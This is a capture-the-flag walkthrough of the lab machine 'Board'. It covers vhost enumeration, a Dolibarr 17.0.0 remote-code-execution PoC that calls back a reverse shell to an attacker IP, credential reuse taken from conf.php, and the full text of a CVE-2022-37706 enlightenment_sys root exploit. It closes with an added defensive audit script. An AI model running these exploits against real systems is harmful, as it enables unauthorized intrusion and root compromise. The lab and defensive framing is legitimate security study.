Recon:

```shell
rustscan -a 10.10.11.11 --range 1-65535
```

```shell
nmap 10.10.11.11 -p22,80 -sC -sV
```

The web service on port 80 has nothing interesting.

Enumerate vhosts:

```shell
wfuzz -c -u http://board.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.board.htb" --hh 15949
```

This reveals the crm.board.htb vhost, which runs Dolibarr 17.0.0.

A Google search for Dolibarr 17.0.0 turns up a known vulnerability.

The vulnerability requires valid credentials, but trying admin:admin logs in successfully.

Use the following PoC:

```shell
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
```

```shell
python exploit.py http://crm.board.htb admin admin 10.10.16.7 443
```

A shell is received.

/var/www/html/crm.board.htb/htdocs/conf/conf.php contains the database password.

That password is reused as the login password of the larissa user.

Running linpeas.sh reveals a suspicious-looking SUID binary.

A Google search shows it has a known vulnerability.

PoC:

```shell
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
```
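The two host-side weaknesses chained above (a Dolibarr conf.php whose database password is readable by the web-shell user and later reused for larissa, and a setuid-root enlightenment_sys binary affected by CVE-2022-37706) are both things a defender can check for with a few lines of shell. The audit script below is an added example written for this page, not code from the writeup or from the Dolibarr or Enlightenment projects; the conf.php path is the one from this box, and the function names are my own.

```shell
#!/bin/bash
# Added defensive audit example (not from the writeup). Checks two weaknesses
# this box chained: a Dolibarr conf.php readable by other local users, and a
# setuid enlightenment_sys binary (CVE-2022-37706). Function names are my own.

# Return 0 if the group-read or other-read bit is set on the file, 1 if the
# file is owner-only, 2 if it does not exist. Uses `ls -l` columns 5 (group
# read) and 8 (other read) so it works on any ls, not only GNU stat.
dolibarr_conf_readable_by_others() {
    local f="$1"
    [ -f "$f" ] || return 2
    local bits
    bits=$(ls -l "$f" | cut -c5,8)
    case "$bits" in
        *r*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Print every setuid enlightenment_sys found under the given root (default /).
# Empty output means none is present. The setuid bit is what CVE-2022-37706
# needs; `chmod u-s` or upgrading Enlightenment removes the exposure.
find_setuid_enlightenment_sys() {
    find "${1:-/}" -type f -name enlightenment_sys -perm -4000 2>/dev/null
}

# Print the owner of a file (third column of `ls -ld`), e.g. "root".
file_owner() {
    ls -ld "$1" | awk '{print $3}'
}

# Run both checks against a filesystem root and report. Returns the number
# of findings so it can be used from cron or a CI job.
audit_host() {
    local root="${1:-/}"
    local findings=0
    # Path taken from this box; adjust for other Dolibarr installs.
    local conf="$root/var/www/html/crm.board.htb/htdocs/conf/conf.php"

    if dolibarr_conf_readable_by_others "$conf"; then
        echo "[!] $conf is readable by group/other; it holds the DB password. Tighten to 0400/0440."
        findings=$((findings + 1))
    fi

    local bin
    while IFS= read -r bin; do
        [ -n "$bin" ] || continue
        echo "[!] setuid enlightenment_sys at $bin (owner: $(file_owner "$bin")); CVE-2022-37706 candidate"
        findings=$((findings + 1))
    done <<EOF
$(find_setuid_enlightenment_sys "$root")
EOF

    [ "$findings" -eq 0 ] && echo "[+] no findings under $root"
    return "$findings"
}
```

Source the file and run `audit_host /` on the host to be checked; the exit status equals the number of findings, so a non-zero return from a scheduled job flags a host that still has either weakness.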